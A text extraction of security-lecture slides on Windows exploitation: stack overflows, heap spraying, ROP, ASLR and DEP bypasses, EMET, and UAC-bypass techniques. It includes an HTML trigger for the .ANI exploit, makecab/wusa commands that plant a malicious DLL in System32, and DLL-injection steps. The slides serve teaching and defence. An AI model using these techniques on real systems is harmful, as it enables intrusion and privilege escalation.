guest lecture - windows security countermeasure: aslr © 2013 sec consult unternehmensberatung gmbh...
TRANSCRIPT
Version: 1.0
Date: 17.01.2018
Author: R. Freingruber
Responsible: R. Freingruber
Confidentiality Class: Public
Guest Lecture -
Windows Security
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Lecturer
• René Freingruber ([email protected])
• Twitter: @ReneFreingruber
• Student in Bachelor (Technical University Vienna)
• Lecturer at FH St. Pölten & Johannes Kepler University• Reverse Engineering & Exploit Development courses
• Security Consultant at SEC Consult• Reverse Engineering / exploit development / fuzzing
• Trainer: Secure C/C++, Reversing, Windows Hardening and Red Teaming
• Social Engineering / Client Hardening / Internal Audits / Web Pentesting
• Previously spoke at:• CanSecWest, 31C3, DeepSec, NorthSec, RuxCon, ToorCon, ZeroNights,
Bsides Vienna, QuBit, Hacktivity, IT-SeCX, DSS ITSEC, OWASP Chapter
• Lightning Talks: Hack.lu, Recon, Hacktivity
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
SEC Consult
3
Vienna (HQ) | AT
Wiener Neustadt | AT
Vilnius | LT
Berlin| DE
Montreal | CA
Singapore | SG
Moscow | RUFrankfurt | DE
Founded 2002
Leading in IT-Security Services and
Consulting
Strong customer base in Europe and Asia
70+ Security experts
350+ Security audits per year
Zurich | CH
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
WE ARE HIRING
Source: http://www.globalresearch.ca/wp-content/uploads/2015/06/unclesam-we-want-you.jpg
• SEC Consult is hiring!
• Lots of interesting projects in an
international leading security company
• Experienced team with a passion to hack
systems ☺
• Contact: [email protected]
• Just talk to me directly after the talk!
Memory Corruptions
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Classic buffer overflow
High address(e.g. 0xc0000000)Old Values
Stackgrowsdownwards Old EIP (RET)
Arg3: 0x00000006
Arg2: 0x00000005
Arg1: 0x00000063
Old EBP (SFP)EBP
-4(%EBP)
-8(%EBP)
buf[4-7]
buf[0-3]
ESP
STACK before BOF
Write direction
New RET address
Shellcode
NOP Sled(= 0x90909090...)
EBPPadding
(e.g.: 0x414141...)
STACK after BOF
EIPafterret-Instr.
Executionpath
Hardcodedaddress
6
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Protections today
7
We have to bypass all
these mitigation
techniques!
No protection mechanism
is 100% bullet proof, all
can be bypassed in some
special situations
The most difficult part is to
bypass ASLR and DEP
together
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Countermeasure: ASLR
High address
NOT STATIC
New RET address
Shellcode
NOP Sled(= 0x90909090...)
EBPPadding
(e.g.: 0x414141...)
STACK after BOF
Hardcodedaddress
8
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Countermeasure: ASLR
• Address space layout randomization
• Randomizes:
• Start address of the stack (local variables, function arguments, ..)
• Start address of the heap (dynamically allocated variables)
• Start address of the code segments
• Address of PEB (process environment block)
• Address of TEB (thread environment block)
• Returned addresses of VirtualAlloc (since Windows 8.1)
• ....
• Security heavily depends on number of randomized bits
• 64-bit provides much more security than 32-bit!
9
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Countermeasure: ASLR
• There are many ways to bypass ASLR!
• Use an information leak vulnerable
• For local 32-bit applications it‘s possible to brute-force
• Use not randomized segments (heap, VirtualAlloc() returned memory, ...) ; mostly fixed these days
• Partial Overwrites (ASLR randomizes the upper bits, just overwrite the lower bits to jump to another code)
• Use a module which does not support ASLR (that‘s why you should not have java 6 installed!)
10
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
11
Countermeasure: ASLR
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Example .ANI exploit
• Two vulnerabilities:
• MS05-002
• MS07-17
• Can be trigger via Firefox, Internet Explorer, ….
• E.g. code for Internet Explorer:
<html>
<body style=”CURSOR:
url(‘127.0.0.1/exploit.ani’)”</body>
</html>
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Example .ANI exploit
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Example .ANI exploit
• “Anih size” typically 0x24, in the exploit above 120 (0x78)
• Overwrites return address with 0x0d0d0d0d
• Use heap-spray to store shellcode at 0x0d0d0d0d
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Heap Spray
• Idea: Allocate many many strings until every possible memory
address stores the string ...
• Then 0x0d0d0d0d must also store the string and ASLR is
bypassed
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Before Heap Spray
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Before Heap Spray
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
After Heap Spray
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
After Heap Spray
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
gap
Attack technique: Heap Spray
• Return address was overwritten with 0x0d0d0d0d
• 0x0d0d0d0d must point to a location marked as
„good“ to make the exploit working!
• If 0x0d0d0d0d points to „bad“ the application will
crash
-12(%EBP)
0x0d0d0d0d……
0x0d0d0d0d
Shellcode
gap
0x0d0d0d0d……
0x0d0d0d0d
Shellcode
gap
0x0d0d0d0d……
0x0d0d0d0d
Shellcode
gap
0x0d0d0d0d……
0x0d0d0d0d
Shellcode
Good
Bad
Good
Bad
Good
Bad
Good
Bad
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Heap Spray
• Return address was overwritten with 0x0d0d0d0d
• Dump of memory after heap spray:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Heap Spray
• Execution will start executing „OR EAX, 0x0d0d0d0d“ until:
NOP sled
Break for
debugging
Start of
shellcode
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
EMET
• EMET = Microsoft Enhanced Mitigation Experience Toolkit
• Target address gets often reused
• There are just some possible addresses such as 0x0d0d0d0d
• Many exploit developers just copy&paste heap spray code (including the target address)
• EMET‘s HeapSpray protection
• Just preallocates all these target addresses
• Exploit code can‘t spray shellcode to these locations
• Addresses: 0x0a040a04; 0x0a0a0a0a; 0x0b0b0b0b; 0x0c0c0c0c; 0x0d0d0d0d; 0x0e0e0e0e; 0x04040404; 0x05050505; 0x06060606; 0x07070707; 0x08080808; 0x09090909; 0x20202020; 0x14141414
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Countermeasure: DEP
24
High address(e.g. 0xc0000000)
New RET address
Shellcode
NOP Sled(= 0x90909090...)
EBPPadding
(e.g.: 0x414141...)
STACK after BOF
Hardcodedaddress
NOT EXECUTABLE
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Countermeasure: DEP
25
• Data Execution Prevention
• Idea: Data on the stack must not be executable (because it
contains data and not code), thus mark it as not executable
• Attacker can‘t execute his own code because his own code
is stored as data and thus not executable
• Bypass techniques:
• Return2libc
• ROP (Return Oriented Programming)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
26
Countermeasure: DEP
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Bypass DEP
27
• ROP = Return Oriented Programming
• Idea: Reuse / abuse already existing code
• New code can be build be chaining small already existing
code-gadgets together
• Two approaches:
• Write a ROP chain to disable DEP
• Write complete shellcode in ROP
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Return Oriented Programming
28
New RET address0x0d0d0d0d
Shellcode
NOP Sled(= 0x0d0d0d0d...)
ESP
Padding(e.g.: 0x0d0d0d...)
• Let‘s look again at the stack after the function returned to the
manipulated return address:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Return Oriented Programming
29
• Jump to already existing code to bypass ASLR:
• Jump to the middle of the above instruction:
• Important: Corresponding module must be compiled with
ASLR off because otherwise „JMP ESP“ would always be at
another address
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Return Oriented Programming
30
New RET address0x7cb3c1f6
ShellcodeESP
Padding(e.g.: 0x414141...)
• The new attack:
• Another method to bypass ASLR!
• But: With DEP enabled it‘s still not possible to execute the
shellcode....
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: Return Oriented Programming
31
RET: Gadget 1
ESP
• ROP extends this technique to build the complete
shellcode with existing code (so called gadgets!)
EAX: 0x41414141
Gadget 2
ESI: 0x42424242
Padding(e.g.: 0x414141...)
EBP: 0x43434343
Gadget 3
ESP
ESP
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Attack technique: ROP
32
• Typically the ROP chain calls a method to disable DEP
• Then the real shellcode can be executed
• Examples of functions which can be called:
• VirtualAlloc
• VirtualProtect
• SetProcessDEPPolicy
• NtSetInformationProcess
• HeapCreate
• LoadLibrary (E.g.: library from attacker via UNC path)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
VirtualProtect() to disable DEP
33
Source: http://opensecuritytraining.info/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
EMET
• End of life: July 31, 2018
• Every time a „critical function“ (e.g. VirtualProtectEx) gets called it applies
extra checks (but EMET contains many other protections as well)
• Examples:
• Caller / SimExecFlow
• Check if function was called and not returned into (e.g. Check the
instruction in front of the return address)
• MemProt
• Prevent functions (e.g. VirtualProtectEx) from making the stack
executable
• StackProt
• Check if the stack pointer (ESP) points to the stack (or if it was shifted
away)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Windows 10 Exploit Protection
• Windows 10 implements functionality of EMET per default!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Windows 10 Exploit Protection
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Windows 10 Exploit Protection
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
Windows 10 Exploit Protection
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
39
Mitigations on a modern Windows system
(incomplete list!)
• ASLR – Address Space Layout Randomization (kASLR in kernel)
• DEP – Data Execution Protection
• Stack Cookies, Variable Reordering (/GS)
• Heap Protections• safe unlinking, heap cookies, header encoding, isolated heap, delayed
free, MemGC, memprot, ....
• Virtual Table Guard (VTGuard)
• Control Flow Guard (CFG) / Return Flow Guard (RFG)
• Exception Handling• SafeSEH, SEHOP, software DEP, XOR register values
• Sandboxes (Mandatory Integrity Level)
• EMET / Windows10 Exploit Protection• EAF, EAF+, Caller, SimExecFlow, LoadLib, Memprot, HeapSpray,
NullPage, ...
• ACG (Arbitrary Code Guard) / CIG (Code Integrity Guard)
• SMEP / SMAP (Don‘t access user space from kernel space)
• Patchguard / Kernel-Mode Code Signing
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
40
Microsoft vulnerability classes distribution
Source: Exploitation Trends: From Potential Risk to Actual Risk
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
41
Microsoft vulnerability classes distribution
Source: Windows 10 Mitigation Improvements, Microsoft
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
42
Microsoft vulnerability classes distribution
Source: Windows 10 Mitigation Improvements, Microsoft
More vulnerabilities are found, but less exploits are developed
(mitigation techniques make exploit development really hard!)
User Account Control (UAC)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
44
UAC – User Account Control
• Introduced with Microsoft Windows Vista
• What UAC does?
• Create two access tokes for the user
• Standard user access token
• Full Adminstrator access token
• Credential Prompt
• Consent Prompt
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
45
UAC – User Account Control
• Several possibilities exist to bypass UAC
• Public ones only work if UAC is used in default settings
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
46
UAC – User Account Control
• Example, start cmd as normal user, command: whoami /all
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
47
UAC – User Account Control
• Example, start cmd as normal user, command: whoami /all
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
48
UAC – User Account Control
• Now the same, but we start cmd.exe with right click start as
administrator:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
49
UAC – User Account Control
• Now the same, but we start cmd.exe with right click start as
administrator:
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
50
Sandboxes
• This is also how sandboxes work:
• The “unstrusted” chrome process cannot access e.g. the file system
Even if we find a vulnerability in the DOM parser / JS implementation / … we are still inside an untrusted process!
Sandbox escape (another vulnerability) is required to escape!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
51
Abusing privileges
• Some privileges can directly be used to escalate to SYSTEM access!
• SeImpersonatePrivilege
• SeAssignPrimaryPrivilege
• SeTcbPrivilege
• SeBackupPrivilege
• SeRestorePrivilege
• SeCreateTokenPrivilege
• SeLoadDriverPrivilege
• SeTakeOwnershipPrivilege
• SeDebugPrivilege
• Check the following link for an in-depth explanation
• https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
• Privileges can be used in kernel exploits to avoid the requirement of getting code execution! Flipping a single bit is enough to change privileges of your own process!
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
52
Abusing privileges
• Many Microsoft services do not run as local SYSTEM, instead they
run as “local service”
• Idea: If the service is compromised because of a vulnerability, the
attacker does not instantly owns SYSTEM privileges
• Problem: Most services have privileges which can easily be abused…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
53
Abusing privileges
• Example: WPAD Service has SeImpersonatePrivilege
• Can be exploited with “token stealing” and then impersonating that
token with SeImpersonatePrivilege
• Exploit code: https://bugs.chromium.org/p/project-
zero/issues/detail?id=1383#c5
• Other example: Steam had SeDebugPrivilege…
Source: https://googleprojectzero.blogspot.co.at/2017/12/apacolypse-now-exploiting-windows-10-in_18.html
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
54
Back to UAC…
• Situation: Large number of UAC prompts
• Microsoft’s solution: special privileges
• Elevated processes without UAC prompt
• http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-
7000-auto-elevated-binaries/
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
55
Back to UAC…
• Situation: Large number of UAC prompts
• Microsoft’s solution: special privileges
• Elevated processes without UAC prompt
• http://withinwindows.com/2009/02/05/list-of-windows-7-beta-build-
7000-auto-elevated-binaries/
• Processes can create certain elevated COM objects without
UAC prompt
• Process can tell the object to perform „admin“-actions
• Granted to almost every Microsoft executable
(e.g. notepad.exe, calc.exe)
• Elevated COM objects, which can be created without a UAC
prompt
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
56
UAC – User Account Control
Create folders in system32 by using the OpenFile dialog
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
57
UAC – User Account Control
Root cause:
• Automatic silent evaluation
• Signed by Microsoft
• Located in „secure“ directories (e.g. Windows\System32)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
58
UAC – User Account Control
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
59
Different types of UAC bypasses
• There are a lot of „GUI“ bypasses which are really simple (but
you typically don‘t have a GUI as attacker, but they should
show the general problem here…)
• Try it at home yourself!
• *.msc bypasses e.g. start „gpedit.msc“ (no UAC prompt)
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
60
Different types of UAC bypasses
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
61
Different types of UAC bypasses
• Search for „*.*“ to get rid of the .txt filter ( See .exe files)
• Right click on „cmd.exe“
• Start as administrator
• No UAC prompt
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
62
Different types of UAC bypasses
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
63
Different types of UAC bypasses
• Taskmanager
• Start task manager (no UAC prompt)
• File Start process
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
64
UAC – User Account Control
Bypassuac.exe Notepad.exe1) openProcess() to attach
2) VirtualAllocEx() to create memory
3) WriteProcessMemory() to write DLL
4) CreateRemoteThread() to execute DLL
Normal user privileges
Privileges to
create files in
UAC protected
folders without
prompting for
UAC dialog (via
COM objects ;
only Windows
signed binaries
can use the
COM objects)
5) Starts
running
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
65
UAC – User Account Control
Other secure
directory
(e.g. System32)
Secure directory
Priviledges to create files in
UAC protected folders without
prompting for UAC dialogTypically loads
Second
Malicious
DLL
6) Use priviledges of notepad.exe
To write to the „secure“ directory
Injected DLL to notepad.exeSysprep.exe (autoelevate = true)
Now loads
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
66
Different types of UAC bypasses
1. Inject code into an autoelevated process
• DLL preloading attacks
• Differences in the way how the DLL is placed in the secure
directory
• Leo Davidson „sysprep“
• Inject code into explorer.exe
• Code uses COM objects to store the DLL
• Target examples:
• Sysprep.exe with cryptbase.dll, shcore.dll, dbgcore.dll, ...
• Setupsqm.exe with wdscore.dll
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
67
Wusa method
• WUSA (Windows Update standalone installer) method was
used by Carberp – leaked banking trojaner
• wusa uses auto-elevated COM objects to write files, it could
therefore write into system32 without an UAC prompt
• Makecab malicios.dll malicios.tmp
• Wusa malicios.tmp extract:C:\Windows\System32\
• Finally fixed in Windows 10…
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
68
Different types of UAC bypasses
2. Silent redirect execution of an autoelevated process
• Application Compatibility Shim RedirectEXE method
• Shims are used to make old applications compatible with
new operating systems
Application
Shim
Windows
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
69
Different types of UAC bypasses
2. Silent redirect execution of an autoelevated process
• Application Compatibility Shim RedirectEXE method
• Shims are used to make old applications compatible with new
operating systems
• Examples of Shim rules:
• redirectExe
• EmulateHeap
• DisableNX
• “In Memory Fix”
• EMET also use Shims to implement protections
• Generate a Shim (.sdb file) with a redirectExe rule (x86 only)
• Redirect execution of an autoelevated process to own
executable (sdbinst.exe redirect.sdb)
• Signature file will not be redirected…..
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
70
Different types of UAC bypasses
3. Disable UAC via undocumented functions
• Simda Malware used ISecurityEditor COM object
• Undocumented function to make registry writeable
• Examples
• Change the UAC settings in the registry
• Attacker can add a VerifierDLL for an autoelevated application
to inject code
© 2013 SEC Consult Unternehmensberatung GmbH
All rights reserved
Title: Windows Security| Responsible: R. Freingruber
Version / Date: V1.0 / 01-2018] | Confidentiality Class: Public
© 2018 SEC Consult Unternehmensberatung GmbH
All rights reserved
71
Different types of UAC bypasses
4. Trick users to confirm UAC prompt
